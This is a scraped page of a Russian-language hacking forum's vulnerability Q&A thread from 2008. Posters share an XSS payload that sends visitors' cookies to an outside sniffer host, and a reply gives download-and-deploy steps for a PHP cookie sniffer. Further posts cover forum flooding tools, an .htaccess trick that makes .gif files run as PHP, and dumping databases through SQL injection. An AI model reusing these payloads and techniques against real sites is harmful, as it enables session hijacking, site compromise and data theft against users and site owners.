HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 140 из 2438 « Первая < 4090130 136 137 138 139 140 141 142 143 144 1501902406401140 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1391  
Старый 25.03.2008, 01:37
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
С нами: 9584577

Репутация: 69
По умолчанию
нужна помощь в xss, пытаюсь изучать, но много непонятных мелочей.
предположим нужная мне xss
Цитата:
'><script>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script>
насколько я смог понять куки записываются в картику hacknet.gif, т.е у меня должен быть свой сайт с картинкой, которую разрешено изменять на этом сайте без авторизации?или неправильно понял?
Думаю идея вопроса более-менее понятна.
Разъясните мне пожалуйста эти детали
 
Ответить с цитированием

  #1392  
Старый 25.03.2008, 01:41
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами: 9799586

Репутация: 1385


По умолчанию
нет это просто ссылка на сниффер
 
Ответить с цитированием

  #1393  
Старый 25.03.2008, 01:52
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
С нами: 9584577

Репутация: 69
По умолчанию
собственно сам вопрос
Цитата:
http://forum.antichat.ru/showpost.php?p=632546&postcount=1410
Цитата:
нет это просто ссылка на сниффер
ок, где взять этот снифер, как и где его разестить?
---------------------------------------------------------------------
разьясните пожалуйста детали про получение куков
 
Ответить с цитированием

  #1394  
Старый 25.03.2008, 02:47
Sharingan
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
С нами: 10009826

Репутация: 435
По умолчанию
_http://forum.antichat.ru/thread18555.html поиском пользоваться не барское дело?
Вот собственно помощ по гринбировскому сниферу
_http://forum.antichat.ru/thread36829.html
все понятно написано
 
Ответить с цитированием

  #1395  
Старый 25.03.2008, 04:48
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию
Ужс как всё сложно =\
сливаешь http://old.antichat.ru/soft/s.zip, распаковываешь, заливаешь на сервер с поддержкой php, правишь конфиг (если таковой имеется) и всё. вставляешь в скрипт ссылку на сниффер
__________________
 
Ответить с цитированием

  #1396  
Старый 26.03.2008, 11:34
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
С нами: 9626078

Репутация: 141
По умолчанию
сорри елли не туда
возник вот такой вопрос есть ли вожможность обхода фильтрации ковычки через функцию quote() ?
 
Ответить с цитированием

  #1397  
Старый 26.03.2008, 16:45
Rogun
Познающий
Регистрация: 12.02.2008
Сообщений: 90
С нами: 9601728

Репутация: 20
По умолчанию
Есть ли другие флуд-проги на форумах (IPB) помимо Antiturk(Denyo Lauch)?
(при отсутствии ограничений содавать много тем либо сообщений)
 
Ответить с цитированием

  #1398  
Старый 26.03.2008, 16:51
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами: 9741777

Репутация: 100
По умолчанию
Если создать файл .htaccess и вписать в него следующую строчку:
AddTypeapplication/x-httpd-php gif - то все файлы с gif будут интрепетироваться как php файлы.
Я так и сделал. Создать .htaccess. Вписал в него строку и решил проверить для начала на своем сайте. Закинул, полез, но система выдала предупреждение, что 500 ошибка. Вообщем, файл был недоступен.
Почему? И как это можно исправить?
 
Ответить с цитированием

  #1399  
Старый 26.03.2008, 18:41
m0use
Познающий
Регистрация: 22.02.2006
Сообщений: 50
С нами: 10639074

Репутация: 16
По умолчанию
каким образом можно сделать дамп всей базы данных
 
Ответить с цитированием

  #1400  
Старый 26.03.2008, 19:05
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
С нами: 9626078

Репутация: 141
По умолчанию
Цитата:
Сообщение от m0use  
каким образом можно сделать дамп всей базы данных
у тя доступ к базе есть или через скуль ?
если есть доступ к базе тогда почти через любой mysql клиент ежели через скуль Тогда попробуй через "SQL Injection Tool"

2Ershik
а в одном посте не судьба написать ?
такую строчку к своему добавь removehandler.gif отменяет настройки по умолчанию для файлов.gif
Последний раз редактировалось MaSter GeN; 26.03.2008 в 19:15..
 
Ответить с цитированием
Ответ
Страница 140 из 2438 « Первая < 4090130 136 137 138 139 140 141 142 143 144 1501902406401140 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору. Комиссия форума: 2%.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка

Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...